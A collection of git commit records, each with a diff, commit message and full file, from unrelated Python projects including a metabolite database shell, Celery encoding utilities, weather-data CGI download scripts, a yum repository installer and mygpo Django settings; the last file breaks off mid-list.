+json.loads(r.content, object_pairs_hook=OrderedDict, parse_float=Decimal)%09%0A assert result.keys()%5B0%5D == 'CA_KFHP_015'%0A #assert result%5B0%5D%5B0%5D == 'CA_KFHP_015'%0A nose.tools.assert_almost_equal(result%5Bresult.keys()%5B0%5D%5D, Decimal(202.17), places=2)%0A #
nose
@@ -2131,17 +2131,17 @@
ult) ==
-5
+8
, '%25r re
|
2beb62dbd754def3c58f2aa6b3a3431457c88944
|
fix for #9
|
db_demo.py
|
db_demo.py
|
import os
import sys
import cmd
import sqlalchemy
from sqlalchemy import func
from sqlalchemy.orm import sessionmaker
from test import get_sqlite_engine
from kuj_orm import Base, Mtab, MtabIntensity, Exp, etl, mtab_search, mtab_random, match_all_from, match_one
DEBUG=False
def get_session_factory():
if DEBUG:
engine = sqlalchemy.create_engine('sqlite://')
else:
engine = get_sqlite_engine(delete=False)
Base.metadata.create_all(engine)
Session = sessionmaker()
Session.configure(bind=engine)
return Session
# lifting path completion from
# https://stackoverflow.com/questions/16826172/filename-tab-completion-in-cmd-cmd-of-python
def _complete_path(text, line):
arg = line.split()[1:]
dir, base = '', ''
try:
dir, base = os.path.split(arg[-1])
except:
pass
cwd = os.getcwd()
try:
os.chdir(dir)
except:
pass
ret = [f+os.sep if os.path.isdir(f) else f for f in os.listdir('.') if f.startswith(base)]
if base == '' or base == '.':
ret.extend(['./', '../'])
elif base == '..':
ret.append('../')
os.chdir(cwd)
return ret
def mtab_count(session,exp=None):
q = session.query(func.count(Mtab.id))
if exp is not None:
q = q.filter(Mtab.exp.has(name=exp))
return q.first()[0]
def list_exps(session):
for exp_id, count in session.query(Mtab.exp_id, func.count()).\
group_by(Mtab.exp_id):
exp = session.query(Exp).filter(Exp.id==exp_id).first()
print '\t'.join((exp.name,str(count)))
def matches_as_csv(session,pairs):
for m, match in pairs:
out_recs = []
# fixed schema
out_schema = [
'mtab_exp', # source mtab experiment name
'mtab_mz', # source mtab m/z
'mtab_rt', # source mtab retention time
'match_exp', # matched mtab experiment name
'match_mz', # matched mtab m/z
'match_rt', # match mtab retention time
'sample', # sample / datafile containing matched mtab
'intensity' # intensity of matched mtab in that sample
]
# now get metadata for matching metabolite
for mi in session.query(MtabIntensity).\
filter(MtabIntensity.mtab_id==match.id):
# populate fixed schema
out_rec = {
'mtab_exp': m.exp.name,
'mtab_mz': m.mz,
'mtab_rt': m.rt,
'match_exp': match.exp.name,
'match_mz': match.mz,
'match_rt': match.rt,
'sample': mi.sample.name,
'intensity': mi.intensity
}
# now populate variable (per experiment) schema
for attr in mi.sample.attrs:
assert not attr.name in out_rec # fail fast if names collide
out_rec[attr.name] = attr.value
if attr.name not in out_schema: # keep track of all attributes we find
out_schema.append(attr.name)
out_recs.append(out_rec) # save record
# now we have all the output records in hand
# format the output records according to the accumulated union schema
yield ','.join(out_schema)
for rec in out_recs:
out_row = [rec.get(k,'') for k in out_schema]
yield ','.join(map(str,out_row)) # FIXME format numbers better
def console_log(message):
print message
class Shell(cmd.Cmd):
def __init__(self,session_factory):
cmd.Cmd.__init__(self)
self.session_factory = session_factory
self.do_count('')
def do_list(self,args):
session = self.session_factory()
list_exps(session)
session.close()
def do_count(self,args):
session = self.session_factory()
if not args:
n = mtab_count(session)
print '%d metabolites in database' % n
else:
exp = args.split(' ')[0]
n = mtab_count(session, exp)
print '%d metabolites in experiment %s' % (n, exp)
session.close()
def do_add(self,args):
exp, path, mdpath = args.split(' ')
if not os.path.exists(path):
print 'data file %s does not exist' % path
if not os.path.exists(mdpath):
print 'metadata file %s does not exist' % mdpath
else:
print 'loading experiment %s from:' % exp
print 'data file %s' % path
print 'metadata file %s' % mdpath
session = self.session_factory()
etl(session,exp,path,mdpath,log=console_log)
n = session.query(func.count(Mtab.id)).first()[0]
print '%d metabolites in database' % n
session.close()
def complete_add(self, text, line, start_idx, end_idx):
return _complete_path(text, line)
def do_search(self,args):
mz, rt = args.split(' ')
mz = float(mz)
rt = float(rt)
session = self.session_factory()
for m in mtab_search(session,mz,rt):
print m
session.close()
def do_all(self,args):
exp, outf = args.split(' ')
session = self.session_factory()
print 'Searching for matches from %s, please wait ...' % exp
matches = list(match_all_from(session,exp))
if not matches:
print 'No matches found'
else:
print 'Found %d matches' % len(matches)
with open(outf,'w') as fout:
print 'Saving results to %s ...' % outf
for line in matches_as_csv(session,matches):
print >> fout, line
session.close()
def do_remove(self,args):
exp = args.split(' ')[0]
print 'Removing all %s data ...' % exp
session = self.session_factory()
session.query(Mtab).filter(Mtab.exp.has(name=exp)).delete(synchronize_session='fetch')
session.commit()
self.do_list('')
session.close()
def do_test(self,args):
session = self.session_factory()
print 'Randomly matching metabolites...'
while True:
mtab = mtab_random(session)
ms = list(match_one(session,mtab))
if ms:
print '%s matched the following:' % mtab
for m in ms:
print '* %s' % m
break
session.close()
def do_random(self,args):
session = self.session_factory()
print mtab_random(session)
session.close()
def do_exit(self,args):
sys.exit(0)
def do_quit(self,args):
sys.exit(0)
if __name__=='__main__':
shell = Shell(get_session_factory())
shell.cmdloop('Hi Krista')
|
Python
| 0
|
@@ -5926,16 +5926,101 @@
fetch')%0A
+ session.query(Exp).filter(Exp.name==exp).delete(synchronize_session='fetch')%0A
|
c0e09993facdd76e7b1dfbab97285464f83980bb
|
Update version
|
cast_convert/__init__.py
|
cast_convert/__init__.py
|
#!/usr/bin/env python3
__version__ = '0.1.7.11'
from .cmd import cmd as command
from .watch import *
from . import *
from .convert import *
from .media_info import *
import click
@click.command(help="Print version")
def version():
debug_print(__version__)
command.add_command(version)
|
Python
| 0
|
@@ -39,17 +39,17 @@
'0.1.7.1
-1
+7
'%0A%0A%0Afrom
@@ -238,14 +238,8 @@
-debug_
prin
|
b5cd4ff2b02151bca966c53b80dbea8911a7a6b2
|
Upgrade celery.utils.encoding from kombu
|
celery/utils/encoding.py
|
celery/utils/encoding.py
|
"""
celery.utils.encoding
=====================
Utilties to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
__all__ = ["str_to_bytes", "bytes_to_str", "from_utf8",
"default_encoding", "safe_str", "safe_repr"]
is_py3k = sys.version_info >= (3, 0)
if sys.version_info >= (3, 0):
def str_to_bytes(s):
if isinstance(s, str):
return s.encode()
return s
def bytes_to_str(s):
if isinstance(s, bytes):
return s.decode()
return s
def from_utf8(s, *args, **kwargs):
return s
else:
def str_to_bytes(s): # noqa
return s
def bytes_to_str(s): # noqa
return s
def from_utf8(s, *args, **kwargs): # noqa
return s.encode("utf-8", *args, **kwargs)
if sys.platform.startswith("java"):
def default_encoding():
return "utf-8"
else:
def default_encoding(): # noqa
return sys.getfilesystemencoding()
def safe_str(s, errors="replace"):
s = bytes_to_str(s)
if not isinstance(s, basestring):
return safe_repr(s, errors)
return _safe_str(s, errors)
def _safe_str(s, errors="replace"):
if is_py3k:
return s
encoding = default_encoding()
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception, exc:
return "<Unrepresentable %r: %r %r>" % (
type(s), exc, "\n".join(traceback.format_stack()))
def safe_repr(o, errors="replace"):
try:
return repr(o)
except Exception:
return _safe_str(o, errors)
|
Python
| 0
|
@@ -1,13 +1,12 @@
%22%22%22%0A
-%0A
celery.u
@@ -43,15 +43,15 @@
====
-=
%0A%0AUtil
+i
ties
@@ -421,34 +421,15 @@
%0Aif
-sys.version_info %3E= (3, 0)
+is_py3k
:%0A%0A
@@ -696,24 +696,25 @@
rn s%0A%0Aelse:%0A
+%0A
def str_
@@ -740,32 +740,97 @@
# noqa%0A
+ if isinstance(s, unicode):%0A return s.encode()%0A
return s
@@ -1089,16 +1089,17 @@
%22%0Aelse:%0A
+%0A
def
|
a0ff8cc15df5cd9668e11eba3b5e7406b33dcfc5
|
fix RemovedInDjango19Warning on django.utils.importlib
|
celery_haystack/utils.py
|
celery_haystack/utils.py
|
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
from django.db import connection
from haystack.utils import get_identifier
from .conf import settings
def get_update_task(task_path=None):
import_path = task_path or settings.CELERY_HAYSTACK_DEFAULT_TASK
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError as e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Task = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
return Task()
def enqueue_task(action, instance):
"""
Common utility for enqueing a task for the given action and
model instance.
"""
identifier = get_identifier(instance)
kwargs = {}
if settings.CELERY_HAYSTACK_QUEUE:
kwargs['queue'] = settings.CELERY_HAYSTACK_QUEUE
if settings.CELERY_HAYSTACK_COUNTDOWN:
kwargs['countdown'] = settings.CELERY_HAYSTACK_COUNTDOWN
task = get_update_task()
if hasattr(connection, 'on_commit'):
connection.on_commit(
lambda: task.apply_async((action, identifier), {}, **kwargs)
)
else:
task.apply_async((action, identifier), {}, **kwargs)
|
Python
| 0
|
@@ -49,16 +49,85 @@
figured%0A
+try:%0A from importlib import import_module%0Aexcept ImportError:%0A
from dja
|
11cb3297a368b40a6b1002a2394b56ac4fe29f98
|
make sure that the AFOS PIL is uppercase
|
cgi-bin/afos/retrieve.py
|
cgi-bin/afos/retrieve.py
|
#!/usr/bin/env python
import psycopg2
import cgi
import sys
def main():
"""Process the request"""
# Attempt to keep the file from downloading and just displaying in chrome
sys.stdout.write("X-Content-Type-Options: nosniff\n")
sys.stdout.write("Content-type: text/plain\n\n")
form = cgi.FieldStorage()
pil0 = form.getfirst('pil', '')[:6]
limit = int(form.getfirst('limit', 1))
center = form.getfirst('center', '')[:4]
sdate = form.getfirst('sdate', '')[:10]
edate = form.getfirst('edate', '')[:10]
fmt = form.getfirst('fmt', 'text')
if pil0 == '':
sys.stdout.write("ERROR: No pil specified...")
return
centerlimit = '' if center == '' else (" and source = '%s' " % (center, ))
timelimit = ''
if sdate != '' and edate != '':
timelimit = (" and entered >= '%s' and entered < '%s' "
) % (sdate, edate)
pils = pil0.split(",")
myPils = []
for pil in pils:
if len(pil) < 3:
print 'Invalid PIL, try again'
return
if pil[:3] == "WAR":
for q in ['FLS', 'FFS', 'AWW', 'TOR', 'SVR', 'FFW', 'SVS',
'LSR', 'SPS', 'WSW', 'FFA', 'WCN']:
pils.append('%s%s' % (q, pil[3:]))
continue
myPils.append("%6s" % (pil + " ",))
pilAR = "("
for pil in myPils:
pilAR += "'%s'," % (pil,)
pilAR = pilAR[:-1] + ")"
if myPils[0][:3] == 'MTR':
access = psycopg2.connect(database='iem', host='iemdb', user='nobody')
cursor = access.cursor()
sql = """
SELECT raw from current_log c JOIN stations t
on (t.iemid = c.iemid)
WHERE raw != '' and id = '%s' ORDER by valid DESC LIMIT %s
""" % (myPils[0][3:].strip(), limit)
cursor.execute(sql)
for row in cursor:
sys.stdout.write("\001\n")
sys.stdout.write(row[0].replace("\r\r\n", "\n"))
sys.stdout.write("\n\003")
if cursor.rowcount == 0:
sys.stdout.write("ERROR: METAR lookup for %s failed" % (
myPils[0][3:].strip(), ))
return
try:
mydb = psycopg2.connect(database='afos', host='iemdb', user='nobody')
except:
print 'Error Connecting to Database, please try again!'
return
cursor = mydb.cursor()
# Do optimized query first, see if we can get our limit right away
sql = """
SELECT data from products WHERE pil IN """ + pilAR + """
and entered > now() - '2 days'::interval %s %s
ORDER by entered DESC LIMIT %s""" % (centerlimit, timelimit, limit)
cursor.execute(sql)
if cursor.rowcount != limit:
sql = """
SELECT data from products WHERE pil IN """ + pilAR + """ %s %s
ORDER by entered DESC LIMIT %s """ % (centerlimit, timelimit,
limit)
cursor.execute(sql)
for row in cursor:
if fmt == 'html':
sys.stdout.write("<pre>\n")
else:
sys.stdout.write("\001\n")
# Remove control characters from the product as we are including
# them manually here...
sys.stdout.write((row[0]).replace(
"\003", "").replace("\001\r\r\n", "").replace("\r\r\n", "\n"))
if fmt == 'html':
sys.stdout.write("</pre>\n")
else:
sys.stdout.write("\n\003\n")
if cursor.rowcount == 0:
print "Could not Find: "+pil
if __name__ == '__main__':
main()
|
Python
| 0.999999
|
@@ -356,16 +356,24 @@
'')%5B:6%5D
+.upper()
%0A lim
|
eab44e76010055040242d06ba39218e4c42a6fe1
|
correct failure logic in daily download
|
cgi-bin/request/daily.py
|
cgi-bin/request/daily.py
|
"""Download IEM summary data!"""
from io import StringIO
import datetime
from paste.request import parse_formvars
from pyiem.util import get_dbconn
from pyiem.network import Table as NetworkTable
def get_climate(network, stations):
"""Fetch the climatology for these stations"""
nt = NetworkTable(network)
if not nt.sts:
return "ERROR: Invalid network specified"
data = dict()
clisites = []
cldata = dict()
for station in stations:
if station not in nt.sts:
return ("ERROR: station: %s not found in network: %s") % (
station,
network,
)
cldata[nt.sts[station]["ncdc81"]] = dict()
clisites.append(nt.sts[station]["ncdc81"])
if not clisites:
return data
if len(clisites) == 1:
clisites.append("XX")
mesosite = get_dbconn("coop")
cursor = mesosite.cursor()
cursor.execute(
"""
SELECT station, valid, high, low, precip
from ncdc_climate81 where station in %s
""",
(tuple(clisites),),
)
for row in cursor:
cldata[row[0]][row[1].strftime("%m%d")] = {
"high": row[2],
"low": row[3],
"precip": row[4],
}
sts = datetime.datetime(2000, 1, 1)
ets = datetime.datetime(2001, 1, 1)
for stid in stations:
data[stid] = dict()
now = sts
clsite = nt.sts[stid]["ncdc81"]
while now < ets:
key = now.strftime("%m%d")
data[stid][key] = cldata[clsite].get(
key, dict(high="M", low="M", precip="M")
)
now += datetime.timedelta(days=1)
return data
def get_data(network, sts, ets, stations):
"""Go fetch data please"""
pgconn = get_dbconn("iem")
cursor = pgconn.cursor()
climate = get_climate(network, stations)
if not isinstance(climate, dict):
return ""
sio = StringIO()
sio.write(
"station,day,max_temp_f,min_temp_f,max_dewpoint_f,"
"min_dewpoint_f,precip_in,avg_wind_speed_kts,avg_wind_drct,"
"min_rh,avg_rh,max_rh,climo_high_f,climo_low_f,climo_precip_in,"
"snow_in,snowd_in,min_feel,avg_feel,max_feel,max_wind_speed_kts,"
"max_wind_gust_kts\n"
)
if len(stations) == 1:
stations.append("ZZZZZ")
cursor.execute(
"""SELECT id, day, max_tmpf, min_tmpf, max_dwpf, min_dwpf,
pday, avg_sknt, vector_avg_drct, min_rh, avg_rh, max_rh, snow,
snowd, min_feel, avg_feel, max_feel, max_sknt, max_gust
from summary s JOIN stations t
on (t.iemid = s.iemid) WHERE
s.day >= %s and s.day < %s and t.network = %s and t.id in %s
ORDER by day ASC""",
(sts, ets, network, tuple(stations)),
)
for row in cursor:
sio.write(
(
"%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,"
"%s,%s\n"
)
% (
row[0],
row[1],
row[2],
row[3],
row[4],
row[5],
row[6],
row[7],
row[8],
row[9],
row[10],
row[11],
climate[row[0]][row[1].strftime("%m%d")]["high"],
climate[row[0]][row[1].strftime("%m%d")]["low"],
climate[row[0]][row[1].strftime("%m%d")]["precip"],
row[12],
row[13],
row[14],
row[15],
row[16],
row[17],
row[18],
)
)
return sio.getvalue()
def application(environ, start_response):
"""See how we are called"""
form = parse_formvars(environ)
sts = datetime.date(
int(form.get("year1")), int(form.get("month1")), int(form.get("day1"))
)
ets = datetime.date(
int(form.get("year2")), int(form.get("month2")), int(form.get("day2"))
)
start_response("200 OK", [("Content-type", "text/plain")])
stations = form.getall("stations")
if not stations:
stations = form.getall("station")
if not stations:
return [b"ERROR: No stations specified for request"]
network = form.get("network")[:12]
return [get_data(network, sts, ets, stations).encode("ascii")]
|
Python
| 0.000001
|
@@ -308,16 +308,35 @@
(network
+, only_online=False
)%0A if
@@ -1932,18 +1932,23 @@
return
-%22%22
+climate
%0A sio
|
7d89c9c3229ebd7d8b56edf211e7020c3fad29a0
|
add support for msgpack
|
utils/encoders.py
|
utils/encoders.py
|
# Copyright (C) 2015 SlimRoms Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
SUPPORTED_ENCODERS = {}
import json
def json_encode(obj, pretty=False):
kwargs = {}
if pretty:
kwargs['indent'] = 4
kwargs['separators'] = (',', ': ')
return json.dumps(obj, **kwargs).replace("</", "<\\/")
SUPPORTED_ENCODERS.update({
'json': {
'headers': (("Content-Type", "application/json; charset=UTF-8"),),
'encoder': json_encode
}
})
try:
import xmltodict
except ImportError:
pass
else:
def xml_encode(obj, pretty=False):
if len(obj) == 1:
obj = {'root': obj}
return xmltodict.unparse(obj, pretty=pretty)
SUPPORTED_ENCODERS.update({
'xml': {
'headers': (("Content-Type", "application/xml; charset=UTF-8"),),
'encoder': xml_encode
}
})
try:
import yaml
except ImportError:
pass
else:
def yaml_encode(obj, pretty=False):
yaml.safe_dump(obj, default_flow_style=(not pretty))
SUPPORTED_ENCODERS.update({
'yaml': {
'headers': (("Content-Type", "text/yaml; charset=UTF-8"),),
'encoder': yaml_encode
}
})
|
Python
| 0
|
@@ -1679,28 +1679,428 @@
aml_encode%0A %7D%0A %7D)%0A
+%0A%0Atry:%0A try:%0A import msgpack%0A except ImportError:%0A import umsgpack as msgpack%0Aexcept ImportError:%0A pass%0Aelse:%0A def msgpack_encode(obj, pretty=False):%0A return msgpack.dumps(obj)%0A SUPPORTED_ENCODERS.update(%7B%0A 'msgpack': %7B%0A 'headers': ((%22Content-Type%22, %22application/msgpack; charset=UTF-8%22),),%0A 'encoder': msgpack_encode%0A %7D%0A %7D)%0A
|
745d3fae6b6055c731a47c13ef77e1faf1a4b7e5
|
upgrade elasticsearch mining backends
|
mining/db/backends/melasticsearch.py
|
mining/db/backends/melasticsearch.py
|
# -*- coding: utf-8 -*-
import json
from elasticsearch import Elasticsearch as ES
class Elasticsearch(object):
def conn(self):
"""Open connection on Elasticsearch DataBase"""
conn = ES([
{"host": self.conf.get('host'),
"port": self.conf.get('port'),
"url_prefix": self.conf.get('db')}
])
return conn
def save(self, house, data, content_type=None):
"""Save meta dada on Elasticsearch"""
if content_type == "application/json":
data = json.dumps(data)
return self.conn().index(index=house, doc_type='json', id=1,
body=data)
def get(self, house, content_type="application/json", callback={}):
"""Get meta data on Elasticsearch"""
data = self.conn().get(index=house, doc_type='json', id=1) or callback
if content_type == "application/json":
return json.loads(data['_source'])
return data['_source']
|
Python
| 0
|
@@ -29,16 +29,32 @@
rt json%0A
+import requests%0A
from ela
@@ -92,16 +92,59 @@
as ES%0A%0A
+from mining.utils.listc import listc_dict%0A%0A
%0Aclass E
@@ -351,56 +351,8 @@
rt')
-,%0A %22url_prefix%22: self.conf.get('db')
%7D%0A
@@ -430,12 +430,14 @@
ype=
-None
+'dict'
):%0A
@@ -493,91 +493,162 @@
-if content_type == %22application/json%22:%0A data = json.dumps(data)%0A
+requests.delete(%22http://%7B%7D:%7B%7D/%7B%7D%22.format(%0A self.conf.get('host'), self.conf.get('port'), house))%0A for obj in data.get('data'):%0A
retu
@@ -643,22 +643,18 @@
-return
+
self.co
@@ -680,74 +680,285 @@
use,
- doc_type='json', id=1,%0A body=data
+%0A doc_type='data'.format(house),%0A body=obj)%0A self.conn().index(index=house,%0A doc_type='columns',%0A body=%7B%22columns%22: data.get('columns')%7D)%0A return self.conn(
)%0A%0A
@@ -995,32 +995,20 @@
t_type=%22
-application/json
+dict
%22, callb
@@ -1069,20 +1069,21 @@
-data
+count
= self.
@@ -1089,18 +1089,20 @@
.conn().
-ge
+coun
t(index=
@@ -1121,155 +1121,1063 @@
ype=
-'json', id=1) or callback%0A if content_type == %22application/json%22:%0A return json.loads(data%5B'_source'%5D)%0A return data%5B'_source'%5D
+%22data%22).get('count')%0A doc_data = self.conn().search(index=house, doc_type='data',%0A body=self.filter(), size=count)%0A data = %7B%7D%0A %22%22%22%0A data%5B'data'%5D = %5Bobj.get(%22_source%22)%0A for obj in doc_data.get('hits').get('hits')%5D%0A %22%22%22%0A data%5B'data'%5D = listc_dict(doc_data.get('hits').get('hits'), %22_source%22)%0A doc_columns = self.conn().search(index=house, doc_type='columns',%0A body=self.filter())%0A data.update(doc_columns.get('hits').get('hits')%5B0%5D.get('_source'))%0A data%5B'count'%5D = count%0A return data%0A%0A def filter(self):%0A %22%22%22Generate dict to applay filter on Elasticsearch%22%22%22%0A filter = %7B%0A %22query%22: %7B%0A %22bool%22: %7B%0A %22should%22: %5B%0A %7B %22match%22: %7B %22country%22: %22Brazil%22%7D%7D,%0A %7B %22match%22: %7B %22full_name%22: %22Daniel Austin%22%7D%7D%0A %5D%0A %7D%0A %7D%0A %7D%0A filter = %7B%22query%22: %7B%22match_all%22 : %7B%7D%7D%7D%0A return filter
%0A
|
00b96577e1c9e7e49319b50a4b9bd055231b0f57
|
Validate os version is supported
|
ContentScripts/systemprep-linuxyumrepoinstall.py
|
ContentScripts/systemprep-linuxyumrepoinstall.py
|
#!/usr/bin/env python
import boto
import re
import shutil
import sys
import urllib2
from boto.exception import BotoClientError
def download_file(url, filename, sourceiss3bucket=None):
"""
Download the file from `url` and save it locally under `filename`.
:rtype : bool
:param url:
:param filename:
:param sourceiss3bucket:
"""
conn = None
if sourceiss3bucket:
bucket_name = url.split('/')[3]
key_name = '/'.join(url.split('/')[4:])
try:
conn = boto.connect_s3()
bucket = conn.get_bucket(bucket_name)
key = bucket.get_key(key_name)
key.get_contents_to_filename(filename=filename)
except (NameError, BotoClientError):
try:
bucket_name = url.split('/')[2].split('.')[0]
key_name = '/'.join(url.split('/')[3:])
bucket = conn.get_bucket(bucket_name)
key = bucket.get_key(key_name)
key.get_contents_to_filename(filename=filename)
except Exception as exc:
raise SystemError('Unable to download file from S3 bucket.\n'
'url = {0}\n'
'bucket = {1}\n'
'key = {2}\n'
'file = {3}\n'
'Exception: {4}'
.format(url, bucket_name, key_name,
filename, exc))
except Exception as exc:
raise SystemError('Unable to download file from S3 bucket.\n'
'url = {0}\n'
'bucket = {1}\n'
'key = {2}\n'
'file = {3}\n'
'Exception: {4}'
.format(url, bucket_name, key_name,
filename, exc))
print('Downloaded file from S3 bucket -- \n'
' url = {0}\n'
' filename = {1}'.format(url, filename))
else:
try:
response = urllib2.urlopen(url)
with open(filename, 'wb') as outfile:
shutil.copyfileobj(response, outfile)
except Exception as exc:
# TODO: Update `except` logic
raise SystemError('Unable to download file from web server.\n'
'url = {0}\n'
'filename = {1}\n'
'Exception: {2}'
.format(url, filename, exc))
print('Downloaded file from web server -- \n'
' url = {0}\n'
' filename = {1}'.format(url, filename))
return True
_supported_dists = ('amazon', 'centos', 'red hat')
_match_supported_dist = re.compile(r'^({0})'
'(?:[^0-9]+)'
'([\d]+[.][\d]+)'
'(?:.*)'
.format('|'.join(_supported_dists)))
_amazon_epel_versions = {
'2014.03' : '6',
'2014.09' : '6',
'2015.03' : '6',
}
def main(yumrepomap=None):
"""
Checks the distribution version and installs yum repo definition files
that are specific to that distribution.
:param yumrepomap: list of dicts, each dict contains two or three keys.
'url': the url to the yum repo definition file
'dist': the linux distribution to which the repo should
be installed. one of 'amazon', 'redhat',
'centos', or 'all'. 'all' is a special keyword
that maps to all distributions.
'epel_version': optional. match the major version of the
epel-release that applies to the
system. one of '6' or '7'. if not
specified, the repo is installed to all
systems.
Example: [ {
'url' : 'url/to/the/yum/repo/definition.repo',
'dist' : 'amazon' or 'redhat' or 'centos' or 'all',
'version' : '6' or '7',
},
]
"""
if not yumrepomap:
print('`yumrepomap` is empty. Nothing to do!')
return None
if not isinstance(yumrepomap, list):
raise SystemError('`yumrepomap` must be a list!')
# Read first line from /etc/system-release
release = None
try:
with open(name='/etc/system-release', mode='rb') as f:
release = f.readline().strip()
except Exception as exc:
raise SystemError('Could not read /etc/system-release. '
'Error: {0}'.format(exc))
# Search the release file for a match against _supported_dists
m = _match_supported_dist.search(release.lower())
if m is None:
# Release not supported, exit with error
raise SystemError('Unsupported OS distribution. OS must be one of: '
'{0}.'.format(', '.join(_supported_dists)))
# Assign dist,version from the match groups tuple, removing any spaces
dist,version = (x.translate(None, ' ') for x in m.groups())
# Determine epel_version
epel_version = None
if 'amazon' == dist:
epel_version = _amazon_epel_versions.get(version, None)
else:
epel_version = version.split('.')[0]
for repo in yumrepomap:
# Test whether this repo should be installed to this system
if repo['dist'] in [dist, 'all'] and repo.get('epel_version', 'all') \
in [epel_version, 'all']:
# Download the yum repo definition to /etc/yum.repos.d/
url = repo['url']
repofile = '/etc/yum.repos.d/{0}'.format(url.split('/')[-1])
download_file(url, repofile)
if __name__ == "__main__":
# Convert command line parameters of the form `param=value` to a dict
kwargs = dict(x.split('=', 1) for x in sys.argv[1:])
# Convert parameter keys to lowercase, parameter values are unmodified
kwargs = dict((k.lower(), v) for k, v in kwargs.items())
# Need to convert a string to a list of dicts,
# First, remove any parentheses or brackets
kwargs['yumrepomap'] = kwargs.get('yumrepomap', '').translate(None, '()[]')
# Then, split the string to form groups around {}
kwargs['yumrepomap'] = re.split('({.*?})', kwargs['yumrepomap'])
# Now remove empty/bad strings
kwargs['yumrepomap'] = [v for v in filter(None, kwargs['yumrepomap']) \
if not v == ', ']
# Remove braces and split on commas. it's now a list of lists
kwargs['yumrepomap'] = [v.translate(None, '{}').split(',') for v in \
kwargs['yumrepomap']]
# Convert to a list of dicts
kwargs['yumrepomap'] = [dict(x.split(':', 1) for x in y) for y in \
kwargs['yumrepomap']]
# Strip whitespace around the keys and values
kwargs['yumrepomap'] = [dict((k.strip(), v.strip()) for k, v in \
x.items()) for x in kwargs['yumrepomap']]
main(**kwargs)
|
Python
| 0
|
@@ -5617,16 +5617,175 @@
.')%5B0%5D%0A%0A
+ if epel_version is None:%0A raise SystemError('Unsupported OS version! dist = %7B0%7D, version = %7B1%7D.'%0A .format(dist, version))%0A%0A
for
|
13152ede55f480533aead0bf6f573081edf2612f
|
update module path for CouchDBEmailBackend
|
mygpo/settings.py
|
mygpo/settings.py
|
# Django settings for mygpo project.
#
# This file is part of my.gpodder.org.
#
# my.gpodder.org is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# my.gpodder.org is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public
# License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with my.gpodder.org. If not, see <http://www.gnu.org/licenses/>.
#
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# http://code.djangoproject.com/wiki/BackwardsIncompatibleChanges#ChangedthewayURLpathsaredetermined
FORCE_SCRIPT_NAME=""
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = ()
MANAGERS = ADMINS
DATABASES = {
'default': {
'NAME': 'mygpo',
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
'HOST': '',
}
}
COUCHDB_DATABASES = (
('mygpo.directory', 'http://127.0.0.1:5984/mygpo'),
('mygpo.core', 'http://127.0.0.1:5984/mygpo'),
('mygpo.users', 'http://127.0.0.1:5984/mygpo'),
('mygpo.maintenance', 'http://127.0.0.1:5984/mygpo'),
('django_couchdb_utils', 'http://127.0.0.1:5984/mygpo'),
)
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.abspath('%s/../htdocs/media/' % os.path.dirname(__file__))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/admin/'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.locale.LocaleMiddleware',
)
ROOT_URLCONF = 'mygpo.urls'
TEMPLATE_DIRS = ()
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.humanize',
'registration',
'couchdbkit.ext.django',
'django_couchdb_utils',
'mygpo.core',
'mygpo.users',
'mygpo.api',
'mygpo.web',
'mygpo.publisher',
'mygpo.data',
'mygpo.userfeeds',
'mygpo.directory',
'mygpo.maintenance',
)
TEST_EXCLUDE = (
'django',
'registration',
)
TEST_RUNNER='mygpo.test.MygpoTestSuiteRunner'
ACCOUNT_ACTIVATION_DAYS = 7
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'mygpo.web.auth.EmailAuthenticationBackend',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
